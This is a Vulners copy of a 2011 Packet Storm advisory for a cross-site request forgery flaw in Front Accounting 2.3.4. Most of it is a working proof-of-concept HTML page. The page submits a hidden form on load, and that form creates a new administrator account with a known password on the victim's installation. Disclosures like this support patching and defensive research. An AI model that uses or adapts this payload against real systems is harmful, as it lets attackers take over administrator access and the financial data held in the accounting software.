Lucene search
K

Front Accounting 2.3.4 Cross Site Request Forgery

🗓️ 03 May 2011 00:00:00Reported by AutoSec ToolsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Front Accounting 2.3.4 Cross Site Request Forgery vulnerability allows creation of new admi

Code
`<!------------------------------------------------------------------------  
# Software................Front Accounting 2.3.4  
# Vulnerability...........Cross-site Request Forgery  
# Threat Level............Low (1/5)  
# Download................http://frontaccounting.com/wb3/  
# Discovery Date..........4/27/2011  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................AutoSec Tools  
# Site....................http://www.autosectools.com/  
# Email...................John Leitch <[email protected]>  
# ------------------------------------------------------------------------  
#   
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in Front Accounting 2.3.4  
# can be exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml">  
<input type="hidden" name="user_id" value="new_admin" />  
<input type="hidden" name="password" value="Password1" />  
<input type="hidden" name="real_name" value="x" />  
<input type="hidden" name="phone" value="x" />  
<input type="hidden" name="email" value="[email protected]" />  
<input type="hidden" name="role_id" value="2" />  
<input type="hidden" name="language" value="C" />  
<input type="hidden" name="pos" value="1" />  
<input type="hidden" name="print_profile" value="" />  
<input type="hidden" name="rep_popup" value="1" />  
<input type="hidden" name="ADD_ITEM" value="Add new" />  
<input type="hidden" name="_focus" value="user_id" />  
<input type="hidden" name="_modified" value="0" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation